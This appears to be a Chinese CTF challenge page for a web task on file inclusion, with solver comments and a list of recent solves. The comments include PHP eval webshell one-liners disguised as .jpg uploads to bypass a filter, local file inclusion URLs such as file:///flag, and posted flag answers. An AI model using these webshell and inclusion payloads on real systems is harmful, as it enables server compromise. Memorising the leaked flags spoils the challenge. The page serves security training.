文件包含2WEB 未解决

分数: 35 金币: 4
题目作者: 未知
一  血: dotast
一血奖励: 3金币
解  决: 3284
提  示: 文件包含
描  述:
文件包含2
评论
G3tcH4r 14天前

花金币看了WP,不过自己试了下,发现script 设置language为php,也可以传能执行命令的马儿,这题蛮有意思

回复 0

迷茫的三千面 21天前

flag{414a91ba57a5e0b5a4eb725b75f5030e}

回复 0

hao7 23天前

flag{69fc76f3ef98a524a3ef56977fc02278}

回复 0

CHLing 5月前

http://114.67.175.224:18550/index.php?file=//flag

回复 1

qiusheng 8月前

1、找到文件包含的路径XXXindex.php?file=upload.php;上传一句话木马(格式保存为jpg)<script language="php">@eval($_POST[cmd])</script> 2、上传完成后访问上传的路径看是否成功。XXX/index.php?file=upload/xxx.jpg 3、用蚁剑连接,url是XX

回复 0

xiaoxiao972521 8月前

虽然index.php?file=/flag 就出来了,但是依旧执着的绕过了upload.php

回复 3
冯飞99 8月前

绕来绕去看到你的评论一把过

回复 0

zzccbb2005 1年前

http://114.67.175.224:10017/index.php?file=file:///flag flag{27d76583b9a54c6ef8af91f66855ac12}

回复 1

109张某 1年前

这个题一句话传好像有些问题,我传了一堆,就只有下面仁兄的file:///flag方法成功了

回复 0
asd+1024 8月前

传木马的话,用<script language='php'>@eval($_POST['asd']);</script>然后,文件格式.jpg,在文件包含就可以了,file:///flag确实简单

回复 0

不会编程的崽 1年前

<?php>被过滤了,用这个<script language="php">@eval($_POST['attack'])</script>绕过,然后文件包含即可

回复 0

2728462336 1年前

文件上传+文件包含

回复 1

WriteUp

image
harry

4 金币

评分(5)

解题动态

1008611wyd 攻破了该题 2分钟前
zttyzz 攻破了该题 16分钟前
burning321 攻破了该题 6小时前
16671766779 攻破了该题 7小时前
APTX4869ZRC 攻破了该题 16小时前
byx341 攻破了该题 22小时前
2075895302 攻破了该题 1天前
20024jok 攻破了该题 1天前
promise 攻破了该题 1天前
sqc02 攻破了该题 1天前
l450507961 攻破了该题 2天前
tushen 攻破了该题 2天前
baozongwi 攻破了该题 3天前
g123456 攻破了该题 3天前
胡萝卜 攻破了该题 3天前
13787026747 攻破了该题 6天前
wZuMInG 攻破了该题 6天前
17839227036 攻破了该题 6天前
hh4h 攻破了该题 6天前
The0Razor 攻破了该题 7天前
问题反馈